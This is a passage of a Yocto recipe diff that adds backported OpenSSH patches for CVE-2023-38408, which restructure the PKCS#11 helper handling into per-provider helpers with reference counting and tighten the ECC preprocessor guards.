+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ const BIGNUM *rp, EC_KEY *ec)
+@@ -220,12 +220,12 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ sshbuf_free(msg);
+ return (ret);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ static RSA_METHOD *helper_rsa;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static EC_KEY_METHOD *helper_ecdsa;
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* redirect private key crypto operations to the ssh-pkcs11-helper */
+ static void
+@@ -233,10 +233,10 @@ wrap_key(struct sshkey *k)
+ {
+ if (k->type == KEY_RSA)
+ RSA_set_method(k->rsa, helper_rsa);
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ else if (k->type == KEY_ECDSA)
+ EC_KEY_set_method(k->ecdsa, helper_ecdsa);
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ else
+ fatal("%s: unknown key type", __func__);
+ }
+@@ -247,7 +247,7 @@ pkcs11_start_helper_methods(void)
+ if (helper_rsa != NULL)
+ return (0);
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
+ unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
+ if (helper_ecdsa != NULL)
+@@ -257,7 +257,7 @@ pkcs11_start_helper_methods(void)
+ return (-1);
+ EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
+ EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
+ fatal("%s: RSA_meth_dup failed", __func__);
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index a302c79..b56a41b 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -78,7 +78,7 @@ struct pkcs11_key {
+
+ int pkcs11_interactive = 0;
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static void
+ ossl_error(const char *msg)
+ {
+@@ -89,7 +89,7 @@ ossl_error(const char *msg)
+ error("%s: libcrypto error: %.100s", __func__,
+ ERR_error_string(e, NULL));
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ int
+ pkcs11_init(int interactive)
+@@ -190,10 +190,10 @@ pkcs11_del_provider(char *provider_id)
+
+ static RSA_METHOD *rsa_method;
+ static int rsa_idx = 0;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static EC_KEY_METHOD *ec_key_method;
+ static int ec_key_idx = 0;
+-#endif
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* release a wrapped object */
+ static void
+@@ -492,7 +492,7 @@ pkcs11_rsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
+ return (0);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ /* openssl callback doing the actual signing operation */
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+@@ -604,7 +604,7 @@ pkcs11_ecdsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
+
+ return (0);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ /* remove trailing spaces */
+ static void
+@@ -679,7 +679,7 @@ pkcs11_key_included(struct sshkey ***keysp, int *nkeys, struct sshkey *key)
+ return (0);
+ }
+
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ static struct sshkey *
+ pkcs11_fetch_ecdsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ CK_OBJECT_HANDLE *obj)
+@@ -802,7 +802,7 @@ fail:
+
+ return (key);
+ }
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+ static struct sshkey *
+ pkcs11_fetch_rsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+@@ -910,7 +910,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ #endif
+ struct sshkey *key = NULL;
+ int i;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ int nid;
+ #endif
+ const u_char *cp;
+@@ -999,7 +999,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ key->type = KEY_RSA;
+ key->flags |= SSHKEY_FLAG_EXT;
+ rsa = NULL; /* now owned by key */
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ } else if (EVP_PKEY_base_id(evp) == EVP_PKEY_EC) {
+ if (EVP_PKEY_get0_EC_KEY(evp) == NULL) {
+ error("invalid x509; no ec key");
+@@ -1030,7 +1030,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
+ key->type = KEY_ECDSA;
+ key->flags |= SSHKEY_FLAG_EXT;
+ ec = NULL; /* now owned by key */
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ } else {
+ error("unknown certificate key type");
+ goto out;
+@@ -1237,11 +1237,11 @@ pkcs11_fetch_keys(struct pkcs11_provider *p, CK_ULONG slotidx,
+ case CKK_RSA:
+ key = pkcs11_fetch_rsa_pubkey(p, slotidx, &obj);
+ break;
+-#ifdef HAVE_EC_KEY_METHOD_NEW
++#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+ case CKK_ECDSA:
+ key = pkcs11_fetch_ecdsa_pubkey(p, slotidx, &obj);
+ break;
+-#endif /* HAVE_EC_KEY_METHOD_NEW */
++#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+ default:
+ /* XXX print key type? */
+ key = NULL;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
new file mode 100644
index 0000000000..25ba921869
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
@@ -0,0 +1,581 @@
+From 92cebfbcc221c9ef3f6bbb78da3d7699c0ae56be Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 14:03:45 +0000
+Subject: [PATCH 02/12] upstream: Separate ssh-pkcs11-helpers for each p11
+ module
+
+Make ssh-pkcs11-client start an independent helper for each provider,
+providing better isolation between modules and reliability if a single
+module misbehaves.
+
+This also implements reference counting of PKCS#11-hosted keys,
+allowing ssh-pkcs11-helper subprocesses to be automatically reaped
+when no remaining keys reference them. This fixes some bugs we have
+that make PKCS11 keys unusable after they have been deleted, e.g.
+https://bugzilla.mindrot.org/show_bug.cgi?id=3125
+
+ok markus@
+
+OpenBSD-Commit-ID: 0ce188b14fe271ab0568f4500070d96c5657244e
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/099cdf59ce1e72f55d421c8445bf6321b3004755]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11-client.c | 372 +++++++++++++++++++++++++++++++++-----------
+ 1 file changed, 282 insertions(+), 90 deletions(-)
+
+diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
+index 41114c7..4f3c6ed 100644
+--- a/ssh-pkcs11-client.c
++++ b/ssh-pkcs11-client.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-pkcs11-client.c,v 1.16 2020/01/25 00:03:36 djm Exp $ */
++/* $OpenBSD: ssh-pkcs11-client.c,v 1.18 2023/07/19 14:03:45 djm Exp $ */
+ /*
+ * Copyright (c) 2010 Markus Friedl. All rights reserved.
+ * Copyright (c) 2014 Pedro Martelletto. All rights reserved.
+@@ -30,12 +30,11 @@
+ #include <string.h>
+ #include <unistd.h>
+ #include <errno.h>
++#include <limits.h>
+
+ #include <openssl/ecdsa.h>
+ #include <openssl/rsa.h>
+
+-#include "openbsd-compat/openssl-compat.h"
+-
+ #include "pathnames.h"
+ #include "xmalloc.h"
+ #include "sshbuf.h"
+@@ -47,18 +46,140 @@
+ #include "ssh-pkcs11.h"
+ #include "ssherr.h"
+
++#include "openbsd-compat/openssl-compat.h"
++
+ /* borrows code from sftp-server and ssh-agent */
+
+-static int fd = -1;
+-static pid_t pid = -1;
++/*
++ * Maintain a list of ssh-pkcs11-helper subprocesses. These may be looked up
++ * by provider path or their unique EC/RSA METHOD pointers.
++ */
++struct helper {
++ char *path;
++ pid_t pid;
++ int fd;
++ RSA_METHOD *rsa_meth;
++ EC_KEY_METHOD *ec_meth;
++ int (*rsa_finish)(RSA *rsa);
++ void (*ec_finish)(EC_KEY *key);
++ size_t nrsa, nec; /* number of active keys of each type */
++};
++static struct helper **helpers;
++static size_t nhelpers;
++
++static struct helper *
++helper_by_provider(const char *path)
++{
++ size_t i;
++
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] == NULL || helpers[i]->path == NULL ||
++ helpers[i]->fd == -1)
++ continue;
++ if (strcmp(helpers[i]->path, path) == 0)
++ return helpers[i];
++ }
++ return NULL;
++}
++
++static struct helper *
++helper_by_rsa(const RSA *rsa)
++{
++ size_t i;
++ const RSA_METHOD *meth;
++
++ if ((meth = RSA_get_method(rsa)) == NULL)
++ return NULL;
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] != NULL && helpers[i]->rsa_meth == meth)
++ return helpers[i];
++ }
++ return NULL;
++
++}
++
++static struct helper *
++helper_by_ec(const EC_KEY *ec)
++{
++ size_t i;
++ const EC_KEY_METHOD *meth;
++
++ if ((meth = EC_KEY_get_method(ec)) == NULL)
++ return NULL;
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] != NULL && helpers[i]->ec_meth == meth)
++ return helpers[i];
++ }
++ return NULL;
++
++}
++
++static void
++helper_free(struct helper *helper)
++{
++ size_t i;
++ int found = 0;
++
++ if (helper == NULL)
++ return;
++ if (helper->path == NULL || helper->ec_meth == NULL ||
++ helper->rsa_meth == NULL)
++ fatal("%s: inconsistent helper", __func__);
++ debug3("%s: free helper for provider %s", __func__ , helper->path);
++ for (i = 0; i < nhelpers; i++) {
++ if (helpers[i] == helper) {
++ if (found)
++ fatal("%s: helper recorded more than once", __func__);
++ found = 1;
++ }
++ else if (found)
++ helpers[i - 1] = helpers[i];
++ }
++ if (found) {
++ helpers = xrecallocarray(helpers, nhelpers,
++ nhelpers - 1, sizeof(*helpers));
++ nhelpers--;
++ }
++ free(helper->path);
++ EC_KEY_METHOD_free(helper->ec_meth);
++ RSA_meth_free(helper->rsa_meth);
++ free(helper);
++}
++
++static void
++helper_terminate(struct helper *helper)
++{
++ if (helper == NULL) {
++ return;
++ } else if (helper->fd == -1) {
++ debug3("%s: already terminated", __func__);
++ } else {
++ debug3("terminating helper for %s; "
++ "remaining %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ close(helper->fd);
++ /* XXX waitpid() */
++ helper->fd = -1;
++ helper->pid = -1;
++ }
++ /*
++ * Don't delete the helper entry until there are no remaining keys
++ * that reference it. Otherwise, any signing operation would call
++ * a free'd METHOD pointer and that would be bad.
++ */
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_free(helper);
++}
+
+ static void
+-send_msg(struct sshbuf *m)
++send_msg(int fd, struct sshbuf *m)
+ {
+ u_char buf[4];
+ size_t mlen = sshbuf_len(m);
+ int r;
+
++ if (fd == -1)
++ return;
+ POKE_U32(buf, mlen);
+ if (atomicio(vwrite, fd, buf, 4) != 4 ||
+ atomicio(vwrite, fd, sshbuf_mutable_ptr(m),
+@@ -69,12 +190,15 @@ send_msg(struct sshbuf *m)
+ }
+
+ static int
+-recv_msg(struct sshbuf *m)
++recv_msg(int fd, struct sshbuf *m)
+ {
+ u_int l, len;
+ u_char c, buf[1024];
+ int r;
+
++ sshbuf_reset(m);
++ if (fd == -1)
++ return 0; /* XXX */
+ if ((len = atomicio(read, fd, buf, 4)) != 4) {
+ error("read from helper failed: %u", len);
+ return (0); /* XXX */
+@@ -83,7 +207,6 @@ recv_msg(struct sshbuf *m)
+ if (len > 256 * 1024)
+ fatal("response too long: %u", len);
+ /* read len bytes into m */
+- sshbuf_reset(m);
+ while (len > 0) {
+ l = len;
+ if (l > sizeof(buf))
+@@ -104,14 +227,17 @@ recv_msg(struct sshbuf *m)
+ int
+ pkcs11_init(int interactive)
+ {
+- return (0);
++ return 0;
+ }
+
+ void
+ pkcs11_terminate(void)
+ {
+- if (fd >= 0)
+- close(fd);
++ size_t i;
++
++ debug3("%s: terminating %zu helpers", __func__, nhelpers);
++ for (i = 0; i < nhelpers; i++)
++ helper_terminate(helpers[i]);
+ }
+
+ static int
+@@ -122,7 +248,11 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ u_char *blob = NULL, *signature = NULL;
+ size_t blen, slen = 0;
+ int r, ret = -1;
++ struct helper *helper;
+
++ if ((helper = helper_by_rsa(rsa)) == NULL || helper->fd == -1)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
+ if (padding != RSA_PKCS1_PADDING)
+ goto fail;
+ key = sshkey_new(KEY_UNSPEC);
+@@ -144,10 +274,10 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ (r = sshbuf_put_string(msg, from, flen)) != 0 ||
+ (r = sshbuf_put_u32(msg, 0)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
++ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
+ if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ if (slen <= (size_t)RSA_size(rsa)) {
+@@ -163,7 +293,26 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
+ return (ret);
+ }
+
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
++static int
++rsa_finish(RSA *rsa)
++{
++ struct helper *helper;
++
++ if ((helper = helper_by_rsa(rsa)) == NULL)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: free PKCS11 RSA key for provider %s", __func__, helper->path);
++ if (helper->rsa_finish != NULL)
++ helper->rsa_finish(rsa);
++ if (helper->nrsa == 0)
++ fatal("%s: RSA refcount error", __func__);
++ helper->nrsa--;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_terminate(helper);
++ return 1;
++}
++
+ static ECDSA_SIG *
+ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ const BIGNUM *rp, EC_KEY *ec)
+@@ -175,7 +324,11 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ u_char *blob = NULL, *signature = NULL;
+ size_t blen, slen = 0;
+ int r, nid;
++ struct helper *helper;
+
++ if ((helper = helper_by_ec(ec)) == NULL || helper->fd == -1)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
+ nid = sshkey_ecdsa_key_to_nid(ec);
+ if (nid < 0) {
+ error("%s: couldn't get curve nid", __func__);
+@@ -203,10 +356,10 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ (r = sshbuf_put_string(msg, dgst, dgst_len)) != 0 ||
+ (r = sshbuf_put_u32(msg, 0)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
++ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
+ if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ cp = signature;
+@@ -220,75 +373,110 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+ sshbuf_free(msg);
+ return (ret);
+ }
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+-static RSA_METHOD *helper_rsa;
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+-static EC_KEY_METHOD *helper_ecdsa;
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
++static void
++ecdsa_do_finish(EC_KEY *ec)
++{
++ struct helper *helper;
++
++ if ((helper = helper_by_ec(ec)) == NULL)
++ fatal("%s: no helper for PKCS11 key", __func__);
++ debug3("%s: free PKCS11 ECDSA key for provider %s", __func__, helper->path);
++ if (helper->ec_finish != NULL)
++ helper->ec_finish(ec);
++ if (helper->nec == 0)
++ fatal("%s: ECDSA refcount error", __func__);
++ helper->nec--;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
++ if (helper->nrsa == 0 && helper->nec == 0)
++ helper_terminate(helper);
++}
+
+ /* redirect private key crypto operations to the ssh-pkcs11-helper */
+ static void
+-wrap_key(struct sshkey *k)
++wrap_key(struct helper *helper, struct sshkey *k)
+ {
+- if (k->type == KEY_RSA)
+- RSA_set_method(k->rsa, helper_rsa);
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+- else if (k->type == KEY_ECDSA)
+- EC_KEY_set_method(k->ecdsa, helper_ecdsa);
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+- else
++ debug3("%s: wrap %s for provider %s", __func__, sshkey_type(k), helper->path);
++ if (k->type == KEY_RSA) {
++ RSA_set_method(k->rsa, helper->rsa_meth);
++ if (helper->nrsa++ >= INT_MAX)
++ fatal("%s: RSA refcount error", __func__);
++ } else if (k->type == KEY_ECDSA) {
++ EC_KEY_set_method(k->ecdsa, helper->ec_meth);
++ if (helper->nec++ >= INT_MAX)
++ fatal("%s: EC refcount error", __func__);
++ } else
+ fatal("%s: unknown key type", __func__);
++ k->flags |= SSHKEY_FLAG_EXT;
++ debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++ helper->path, helper->nrsa, helper->nec);
+ }
+
+ static int
+-pkcs11_start_helper_methods(void)
++pkcs11_start_helper_methods(struct helper *helper)
+ {
+- if (helper_rsa != NULL)
+- return (0);
+-
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+- int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
++ int (*ec_init)(EC_KEY *key);
++ int (*ec_copy)(EC_KEY *dest, const EC_KEY *src);
++ int (*ec_set_group)(EC_KEY *key, const EC_GROUP *grp);
++ int (*ec_set_private)(EC_KEY *key, const BIGNUM *priv_key);
++ int (*ec_set_public)(EC_KEY *key, const EC_POINT *pub_key);
++ int (*ec_sign)(int, const unsigned char *, int, unsigned char *,
+ unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
+- if (helper_ecdsa != NULL)
+- return (0);
+- helper_ecdsa = EC_KEY_METHOD_new(EC_KEY_OpenSSL());
+- if (helper_ecdsa == NULL)
+- return (-1);
+- EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
+- EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+-
+- if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
++ RSA_METHOD *rsa_meth;
++ EC_KEY_METHOD *ec_meth;
++
++ if ((ec_meth = EC_KEY_METHOD_new(EC_KEY_OpenSSL())) == NULL)
++ return -1;
++ EC_KEY_METHOD_get_sign(ec_meth, &ec_sign, NULL, NULL);
++ EC_KEY_METHOD_set_sign(ec_meth, ec_sign, NULL, ecdsa_do_sign);
++ EC_KEY_METHOD_get_init(ec_meth, &ec_init, &helper->ec_finish,
++ &ec_copy, &ec_set_group, &ec_set_private, &ec_set_public);
++ EC_KEY_METHOD_set_init(ec_meth, ec_init, ecdsa_do_finish,
++ ec_copy, ec_set_group, ec_set_private, ec_set_public);
++
++ if ((rsa_meth = RSA_meth_dup(RSA_get_default_method())) == NULL)
+ fatal("%s: RSA_meth_dup failed", __func__);
+- if (!RSA_meth_set1_name(helper_rsa, "ssh-pkcs11-helper") ||
+- !RSA_meth_set_priv_enc(helper_rsa, rsa_encrypt))
++ helper->rsa_finish = RSA_meth_get_finish(rsa_meth);
++ if (!RSA_meth_set1_name(rsa_meth, "ssh-pkcs11-helper") ||
++ !RSA_meth_set_priv_enc(rsa_meth, rsa_encrypt) ||
++ !RSA_meth_set_finish(rsa_meth, rsa_finish))
+ fatal("%s: failed to prepare method", __func__);
+
+- return (0);
++ helper->ec_meth = ec_meth;
++ helper->rsa_meth = rsa_meth;
++ return 0;
+ }
+
+-static int
+-pkcs11_start_helper(void)
++static struct helper *
++pkcs11_start_helper(const char *path)
+ {
+ int pair[2];
+- char *helper, *verbosity = NULL;
+-
+- if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
+- verbosity = "-vvv";
+-
+- if (pkcs11_start_helper_methods() == -1) {
+- error("pkcs11_start_helper_methods failed");
+- return (-1);
+- }
++ char *prog, *verbosity = NULL;
++ struct helper *helper;
++ pid_t pid;
+
++ if (nhelpers >= INT_MAX)
++ fatal("%s: too many helpers", __func__);
++ debug3("%s: start helper for %s", __func__, path);
+ if (socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == -1) {
+ error("socketpair: %s", strerror(errno));
+- return (-1);
++ return NULL;
++ }
++ helper = xcalloc(1, sizeof(*helper));
++ if (pkcs11_start_helper_methods(helper) == -1) {
++ error("pkcs11_start_helper_methods failed");
++ goto fail;
+ }
+ if ((pid = fork()) == -1) {
+ error("fork: %s", strerror(errno));
+- return (-1);
++ fail:
++ close(pair[0]);
++ close(pair[1]);
++ RSA_meth_free(helper->rsa_meth);
++ EC_KEY_METHOD_free(helper->ec_meth);
++ free(helper);
++ return NULL;
+ } else if (pid == 0) {
+ if ((dup2(pair[1], STDIN_FILENO) == -1) ||
+ (dup2(pair[1], STDOUT_FILENO) == -1)) {
+@@ -297,18 +485,27 @@ pkcs11_start_helper(void)
+ }
+ close(pair[0]);
+ close(pair[1]);
+- helper = getenv("SSH_PKCS11_HELPER");
+- if (helper == NULL || strlen(helper) == 0)
+- helper = _PATH_SSH_PKCS11_HELPER;
++ prog = getenv("SSH_PKCS11_HELPER");
++ if (prog == NULL || strlen(prog) == 0)
++ prog = _PATH_SSH_PKCS11_HELPER;
++ if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
++ verbosity = "-vvv";
+ debug("%s: starting %s %s", __func__, helper,
+ verbosity == NULL ? "" : verbosity);
+- execlp(helper, helper, verbosity, (char *)NULL);
+- fprintf(stderr, "exec: %s: %s\n", helper, strerror(errno));
++ execlp(prog, prog, verbosity, (char *)NULL);
++ fprintf(stderr, "exec: %s: %s\n", prog, strerror(errno));
+ _exit(1);
+ }
+ close(pair[1]);
+- fd = pair[0];
+- return (0);
++ helper->fd = pair[0];
++ helper->path = xstrdup(path);
++ helper->pid = pid;
++ debug3("%s: helper %zu for \"%s\" on fd %d pid %ld", __func__, nhelpers,
++ helper->path, helper->fd, (long)helper->pid);
++ helpers = xrecallocarray(helpers, nhelpers,
++ nhelpers + 1, sizeof(*helpers));
++ helpers[nhelpers++] = helper;
++ return helper;
+ }
+
+ int
+@@ -322,9 +519,11 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ size_t blen;
+ u_int nkeys, i;
+ struct sshbuf *msg;
++ struct helper *helper;
+
+- if (fd < 0 && pkcs11_start_helper() < 0)
+- return (-1);
++ if ((helper = helper_by_provider(name)) == NULL &&
++ (helper = pkcs11_start_helper(name)) == NULL)
++ return -1;
+
+ if ((msg = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+@@ -332,10 +531,10 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ (r = sshbuf_put_cstring(msg, name)) != 0 ||
+ (r = sshbuf_put_cstring(msg, pin)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
++ send_msg(helper->fd, msg);
+ sshbuf_reset(msg);
+
+- type = recv_msg(msg);
++ type = recv_msg(helper->fd, msg);
+ if (type == SSH2_AGENT_IDENTITIES_ANSWER) {
+ if ((r = sshbuf_get_u32(msg, &nkeys)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -350,7 +549,7 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ __func__, ssh_err(r));
+ if ((r = sshkey_from_blob(blob, blen, &k)) != 0)
+ fatal("%s: bad key: %s", __func__, ssh_err(r));
+- wrap_key(k);
++ wrap_key(helper, k);
+ (*keysp)[i] = k;
+ if (labelsp)
+ (*labelsp)[i] = label;
+@@ -371,22 +570,15 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ int
+ pkcs11_del_provider(char *name)
+ {
+- int r, ret = -1;
+- struct sshbuf *msg;
+-
+- if ((msg = sshbuf_new()) == NULL)
+- fatal("%s: sshbuf_new failed", __func__);
+- if ((r = sshbuf_put_u8(msg, SSH_AGENTC_REMOVE_SMARTCARD_KEY)) != 0 ||
+- (r = sshbuf_put_cstring(msg, name)) != 0 ||
+- (r = sshbuf_put_cstring(msg, "")) != 0)
+- fatal("%s: buffer error: %s", __func__, ssh_err(r));
+- send_msg(msg);
+- sshbuf_reset(msg);
+-
+- if (recv_msg(msg) == SSH_AGENT_SUCCESS)
+- ret = 0;
+- sshbuf_free(msg);
+- return (ret);
++ struct helper *helper;
++
++ /*
++ * ssh-agent deletes keys before calling this, so the helper entry
++ * should be gone before we get here.
++ */
++ debug3("%s: delete %s", __func__, name);
++ if ((helper = helper_by_provider(name)) != NULL)
++ helper_terminate(helper);
++ return 0;
+ }
+-
+ #endif /* ENABLE_PKCS11 */
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
new file mode 100644
index 0000000000..e16e5e245e
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
@@ -0,0 +1,171 @@
+From 2f1be98e83feb90665b9292eff8bb734537fd491 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 14:02:27 +0000
+Subject: [PATCH 03/12] upstream: Ensure FIDO/PKCS11 libraries contain expected
+ symbols
+
+This checks via nlist(3) that candidate provider libraries contain one
+of the symbols that we will require prior to dlopen(), which can cause
+a number of side effects, including execution of constructors.
+
+Feedback deraadt; ok markus
+
+OpenBSD-Commit-ID: 1508a5fbd74e329e69a55b56c453c292029aefbe
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/29ef8a04866ca14688d5b7fed7b8b9deab851f77]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ misc.c | 77 ++++++++++++++++++++++++++++++++++++++++++++++++++++
+ misc.h | 1 +
+ ssh-pkcs11.c | 4 +++
+ ssh-sk.c | 6 ++--
+ 4 files changed, 86 insertions(+), 2 deletions(-)
+
+diff --git a/misc.c b/misc.c
